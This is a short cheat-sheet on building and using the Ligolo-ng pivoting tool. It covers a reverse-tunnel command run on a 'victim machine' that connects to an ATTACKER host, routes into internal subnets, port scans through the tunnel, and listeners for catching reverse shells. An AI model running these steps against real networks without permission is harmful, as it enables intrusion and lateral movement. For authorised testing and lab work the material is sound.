Ligolo

Ligolo allows you to access distant networks over a client/server connection, using tun interfaces.

https://github.com/nicocha30/ligolo-ng

https://docs.ligolo.ng/

https://docs.ligolo.ng/sample/basic/

https://jvsautomate.com/blog/Ligolo-ng-Multi-Pivot-My-Methods/

Build

git clone https://github.com/nicocha30/ligolo-ng /opt/git/ligolo

CMD='cd /src;'
CMD+='env GOARCH=amd64 CGO_ENABLED=0 go build -o /w/ligolo cmd/agent/main.go;'
CMD+='go build -o proxy cmd/proxy/main.go;'
CMD+='env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc go build -o /w/ligolo.exe cmd/agent/main.go;'
docker run -v /var/www/html/:/w -v /opt/git/ligolo:/src/ --rm -it golang /bin/bash -c "$CMD"

Start

Start ligolo server side on your machine, it will print the certificate fingerprint.

sudo /opt/git/ligolo/proxy -selfcert -laddr 0.0.0.0:443

Start client side on victim machine, using bind or reverse connection.

# Reverse connection
./ligolo -connect ATTACKER:443 -accept-fingerprint REPLACEWITHFINGERPRINT

# Or bind connection
./ligolo -bind VICTIM:443

# Then connect to victim from server
ligolo-ng » connect_agent --ip VICTIM:443

Route

You can now add a route on your attacker machine.

For each ligolo session tunnel you need to add an new interface.

Ligolo have interfaces features but i prefer to use system commands, that will also work when ligolo start as user.

Here is an example to add ligolo1 interface for “user” user, with 172.16.1.0/24 route

sudo ip tuntap add user user mode tun ligolo1
sudo ip link set ligolo1 up
sudo ip route add 172.16.1.0/24 dev ligolo1

Then start tunnel in ligolo

ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » start --tun ligolo1

Use interface_list to list interfaces routes

If you need to remove interface

sudo ip link set ligolo1 down
sudo ip tuntap del dev ligolo1

If you need to remove route

sudo ip route del 172.16.1.0/24

If you need to expose targeted machines local ports, use the 240.0.0.1 ip

sudo ip route add 240.0.0.1/32 dev ligolo1
nmap 240.0.0.1 -sV
sudo ip route del 240.0.0.1/32

Listener

https://docs.ligolo.ng/Listeners/

Ligolo allow you to bind distant ports and redirect traffic back to your machine (or anywhere else)

You can use it to chain ligolo pivots, or to listen for reverseshell connection in a specific network

ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp